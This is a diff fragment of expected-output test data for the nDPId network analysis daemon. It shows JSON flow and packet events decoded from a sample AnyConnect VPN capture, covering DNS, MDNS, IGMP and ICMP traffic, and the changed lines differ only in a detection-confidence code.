+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1569687246924,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1569687246924,"pkt":"NDY7z3UoLH6BsEqhCABFAAB+AABAADYRofVLS0xMCgAA4wA19oMAah4oGBiBgwABAAAAAQAABWxvY2FsAAAGAAEAAAYAAQAAAyoAQAFhDHJvb3Qtc2VydmVycwNuZXQABW5zdGxkDHZlcmlzaWduLWdycwNjb20AeFjpQAAABwgAAAOEAAk6gAABUYA="} -00770{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569687246924,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687246924,"pkt":"LH6BsEqhNDY7z3UoCABFAAA4dQYAAEABY0UKAADjS0tMTAMDBdoAAAAARQAAfgAAQAA2EaH1S0tMTAoAAOMANfaDAGoAAA=="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.305435} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.305435} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246981,"flow_last_seen":1569687246981,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1569687246981,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569687246981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1569687246981,"pkt":"AQBeAAD7GIEORo7ICABFAACMDQUAAP8RwosKAADV4AAA+xTpFOkAeGDHAAAAAAADAAAAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMgAEAACkFoAAAEZQAEgAEAA4AmjqBDkaOyBiBDkaOyA=="} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246981,"flow_last_seen":1569687246981,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1569687246981,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246981,"flow_last_seen":1569687246981,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1569687246981,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569687246982,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687246982,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AHgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QB4u70AAAAAAAMAAAAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAyAAQAAKQWgAAARlAASAAQADgCaOoEORo7IGIEORo7I"} -00705{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00705{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1569687246982,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687246982,"pkt":"AQBeAAACGIEORo7ICABGAAAgLwcAAAECCvoKAADV4AAAApQEAAAXAAgE4AAA+w=="} -00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1569687246982,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687246982,"pkt":"AQBeAAD7GIEORo7ICABGAAAg0EsAAAECaLwKAADV4AAA+5QEAAAWAAkE4AAA+w=="} -00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":200000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1569687247192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1569687247192,"pkt":"GIEORo7INDY7z3UoCABFAAEE6tAAAP8RumAKAADjCgAA1RTpFOkA8ADKAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABQRTFAtUktFUlVSLU9TWCAoOSnADMAyACGAAQAAAHgADQAAAADbaQRuRFBJwCHAMgAQgAEAABGUACIWcnBCQT0zNzoyRTo0Nzo2RDoxODo1NApycFZyPTE1Mi4xEUxQLVJLRVJVUi1PU1ggKDkpDF9kZXZpY2UtaW5mb8AcABAAAQAAEZQAIBRtb2RlbD1NYWNCb29rUHJvMTEsMQpvc3h2ZXJzPTE3wFgAAYABAAAAeAAECgAA4w=="} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":200000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":200000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5SAbt7aDM3a\/IufIAYEAAjBQAAAQEIChwNgekCYGB5FwMDADoAAAAAAAAABP6P4Nbq7ON\/6\/AGxu6nGVDbyH\/VD4ZdKbxLWPLfwYcNeZogzNp7TOtgIRax\/b1ZBFBO"} 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5TAbsf\/fAfcO3V5YAYEADtVwAAAQEIChwNgekAjYToFwMDADoAAAAAAAAABVQHVjyN4wBxs8m+2i54okht8UdFndDP4vwtKiUe9j1LvsBOOnvld8r5j6XDOjeRQG2g"} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1569687247596,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1569687247596,"pkt":"MzMAAAAWGIEORo7Iht1gAAAAACQAAf6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPANy0AAAAAQQAAAD\/AgAAAAAAAAAAAAAAAAD7"} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00626{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569687247596,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687247596,"pkt":"MzMAAAABLH6BsEqhht1gAAAAAHg6\/\/6AAAAAAAAALn6B\/\/6wSqH\/AgAAAAAAAAAAAAAAAAABhgBH5kDAALQAAAAAAAAAABkFAAAAAVGAIAEFWP7tAAAAAAAAAAAAASABBVj+7QAAAAAAAAAAAAIDBEDAAAL9HQAC\/R0AAAAAJgEGRoQCRLAAAAAAAAAAABgDAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAEBLH6BsEqh"} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569687248005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1569687248005,"pkt":"AQBeAAD7GIEORo7ICABFAACszwUAAP8RAGsKAADV4AAA+xTpFOkAmDTQAAAAAAADAAEAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEIX2hvbWVraXTAHAAMAAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMAAHADAAMAAEAAA4QABQRTFAtUktFUlVSLU9TWCAoOSnADAAAKQWgAAARlAASAAQADgCaOoEORo7IGIEORo7I"} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569687248006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"thread_ts_msec":1569687248006,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AJgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QCYj8YAAAAAAAMAAQAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAwAAQhfaG9tZWtpdMAcAAwAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAwAAcAMAAwAAQAADhAAFBFMUC1SS0VSVVItT1NYICg5KcAMAAApBaAAABGUABIABAAOAJo6gQ5GjsgYgQ5Gjsg="} @@ -106,20 +106,20 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0uJpAADgGjuC4GThNCgAA4wBQ3lUJPUQ9aK+croAQAOvt6gAAAQEICuMU+IIcDWN7"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569687251177,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1569687251177,"pkt":"LH6BsEqhNDY7z3UoCABFAAA+HQ0AAP8R\/CcKAADjS0tMTNZDADUAKtGSphcBAAABAAAAAAAABXByaW50BnZpYXNhdANjb20AAAEAAQ=="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 